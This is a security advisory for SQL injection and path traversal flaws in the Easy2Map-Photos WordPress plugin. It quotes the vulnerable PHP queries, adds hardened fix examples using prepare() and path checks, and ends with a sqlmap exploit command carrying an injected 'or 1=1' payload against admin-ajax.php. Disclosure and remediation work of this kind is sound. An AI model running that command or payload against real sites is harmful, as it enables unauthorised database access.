WordPress Easy2Map-Photos 1.09 SQL Injection

2015-07-08T00:00:00
ID PACKETSTORM:132613
Type packetstorm
Reporter Larry W. Cashdollar
Modified 2015-07-08T00:00:00

Description

Title: SQL Injection in easy2map-photos wordpress plugin v1.09
Author: Larry W. Cashdollar, @_larry0  
Date: 2015-06-08  
Download Site: https://wordpress.org/plugins/easy2map-photos  
Vendor: Steven Ellis  
Vendor Notified: 2015-06-08, fixed in v1.1.0  
Vendor Contact: https://profiles.wordpress.org/stevenellis/  
Advisory: http://www.vapid.dhs.org/advisory.php?v=130  
Description: Easy2Map Photos is a simple-yet-powerful tool for generating great-looking geo-tagged photo galleries.  
Vulnerability:  
The following lines in includes/Functions.php are vulnerable to SQL injection because the user input they splice into the query is neither parameterized nor sanitized.
  
48 $wpdb->query(sprintf("UPDATE $mapsTable  
49 SET PolyLines = '%s'  
50 WHERE ID = '%s';", $PolyLines, $mapID));  
218 $wpdb->query(sprintf("  
219 UPDATE $mapsTable  
220 SET TemplateID = '%s',  
221 MapName = '%s',  
222 Settings = '%s',  
223 CSSValues = '%s',  
224 CSSValuesPhoto = '%s',  
225 CSSValuesMap = '%s',  
226 MapHTML = '%s',  
227 IsActive = 1  
228 WHERE ID = %s;",  
229 $_REQUEST['mapTemplateName'],  
230 $_REQUEST['mapName'],  
231 urldecode($_REQUEST['mapSettingsXML']),  
232 urldecode($_REQUEST["parentCSSXML"]),  
233 urldecode($_REQUEST["photoCSSXML"]),  
234 urldecode($_REQUEST["mapCSSXML"]),  
235 urldecode($_REQUEST["mapHTML"]), $mapID));  
  
  
238 //this is a map insert  
239 if (!$wpdb->query(sprintf("  
240 INSERT INTO $mapsTable(  
241 TemplateID,  
242 MapName,  
243 DefaultPinImage,  
244 Settings,  
245 LastInvoked,  
246 PolyLines,  
247 CSSValues,  
248 CSSValuesPhoto,  
249 CSSValuesMap,  
250 MapHTML,  
251 IsActive  
252 ) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s' , 0);",  
253 $_REQUEST['mapTemplateName'],  
254 $_REQUEST['mapName']
  
  
331 $wpdb->query(sprintf("  
332 UPDATE $mapsTable  
333 SET MapName = '%s'  
334 IsActive = 1  
335 WHERE ID = %s;",  
336 $_REQUEST['mapName'],  
337 $mapID));  
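The root cause in each listing above is the same: `sprintf()` only substitutes text, so a `'` in `mapName` ends the string literal and the rest of the value becomes SQL. The block below is an added example, not the plugin's own code, showing how the line-331 UPDATE looks when `$wpdb->prepare()` does the quoting and escaping instead. It assumes it runs inside WordPress (so `$wpdb`, `wp_unslash()` and `sanitize_text_field()` exist), and that `$mapsTable` and `$mapID` are the plugin's own variables, with `$mapsTable` built from `$wpdb->prefix` rather than from user input.

```php
<?php
// Added example (not from the advisory or the plugin): hardened replacement
// for the "save map name" UPDATE at line 331 of includes/Functions.php.
// Assumes WordPress is loaded, as it would be for any plugin file.

/**
 * Rename a map by ID. $wpdb->prepare() turns %s/%d into properly quoted
 * and escaped literals, so user input can no longer break out of the string.
 *
 * $mapsTable     - plugin's table name (assumed: derived from $wpdb->prefix)
 * $mapID         - raw ID from the request
 * $requestedName - raw $_REQUEST['mapName']
 */
function e2m_example_save_map_name( $mapsTable, $mapID, $requestedName ) {
    global $wpdb;

    // An ID belongs in a WHERE clause as an integer, never as a free string.
    $mapID = (int) $mapID;
    if ( $mapID <= 0 ) {
        return false;
    }

    // Undo WordPress' magic slashes, then drop tags and control characters.
    $mapName = sanitize_text_field( wp_unslash( $requestedName ) );

    // Note: %s is a prepare() placeholder, not an sprintf() one. prepare()
    // adds the surrounding quotes itself, so the SQL has no quotes around
    // %s, and the two SET assignments are separated by a comma.
    $sql = $wpdb->prepare(
        "UPDATE {$mapsTable} SET MapName = %s, IsActive = 1 WHERE ID = %d",
        $mapName,
        $mapID
    );

    // Returns the number of affected rows, or false on a query error.
    return $wpdb->query( $sql );
}

// Example call from an admin-ajax handler. With prepare(), a value such as
// "' or 1=1;" is stored as the literal map name and touches no other row.
// (Capability and nonce checks for the handler are a separate concern and
// are omitted here.)
// e2m_example_save_map_name( $mapsTable, $_REQUEST['mapID'], $_REQUEST['mapName'] );
```

The same change applies to the other three listings: every `'%s'` in an `sprintf()` query becomes a bare `%s` passed to `$wpdb->prepare()` with the value as an argument, and every ID column uses `%d`. The `urldecode()` calls in the line-218 and line-238 queries decode the value before it is bound, which is fine, since decoding happens outside the SQL and `prepare()` escapes whatever results.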
  
Also  
  
In MapPinImageUpload.php and MapPinIconSave.php this code would allow someone to create files outside of the intended upload directory by adding ../../../../ path traversal characters:  
  
if (!file_exists($imagesDirectory)) {  
mkdir($imagesDirectory);  
}  
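The `mkdir()` shown above creates whatever path it is handed, so a path component containing `../` walks out of the upload tree. The block below is an added example, not code from the plugin, illustrating one way to guard such a call: accept only a single, restricted path component and build the target under a fixed base directory. The function name `e2m_example_safe_images_dir`, the variables `$uploadBase` and `$requested`, and the temp-directory demo at the bottom are all assumptions for the demo; a plugin would pass the real upload base (for example from `wp_upload_dir()`).

```php
<?php
// Added example (not from the advisory or the plugin): guarding a
// user-influenced directory name before it reaches mkdir().

/**
 * Return an absolute directory path for $requested under $uploadBase, or
 * null if the name is not acceptable. Traversal is prevented by keeping
 * only the last path component and restricting its characters.
 */
function e2m_example_safe_images_dir( string $uploadBase, string $requested ): ?string {
    // Keep only the last component: "../../../../etc" becomes "etc".
    $leaf = basename( $requested );

    // Refuse empty and dot names, and anything outside a conservative set.
    if ( $leaf === '' || $leaf === '.' || $leaf === '..'
         || preg_match( '/[^A-Za-z0-9_\-]/', $leaf ) ) {
        return null;
    }

    // The base must already exist so it can be resolved to a canonical path.
    $base = realpath( $uploadBase );
    if ( $base === false ) {
        return null;
    }

    $target = $base . DIRECTORY_SEPARATOR . $leaf;

    // Defence in depth: the assembled path must still sit under the base.
    if ( strpos( $target, $base . DIRECTORY_SEPARATOR ) !== 0 ) {
        return null;
    }
    return $target;
}

// Demo using a constructed temporary base directory.
$uploadBase = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'e2m_example_uploads';
if ( ! is_dir( $uploadBase ) ) {
    mkdir( $uploadBase, 0755, true );
}

// Constructed inputs: one normal name, one traversal attempt, one with a
// disallowed character, one bare "..".
foreach ( [ 'gallery1', '../../../../etc', 'a b', '..' ] as $input ) {
    $imagesDirectory = e2m_example_safe_images_dir( $uploadBase, $input );
    if ( $imagesDirectory === null ) {
        echo "rejected: {$input}\n";
        continue;
    }
    // The advisory's mkdir() call, now only ever reached with a safe path.
    if ( ! file_exists( $imagesDirectory ) ) {
        mkdir( $imagesDirectory, 0755 );
    }
    echo "created: {$imagesDirectory}\n";
}
```

Run with `php` on the command line: `gallery1` is created under the temp base, the traversal input is reduced to `etc` inside the base rather than outside it, and the other two inputs are rejected before `mkdir()` runs. The character whitelist is deliberately narrow; if the plugin needs other characters in directory names, widen the regex rather than dropping the `basename()` step, since that step is what removes the `../` components.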
  
CVE IDs: CVE-2015-4615, CVE-2015-4617
OSVDB:  
Exploit Code:  
$ sqlmap -u 'http://wp.site:80/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3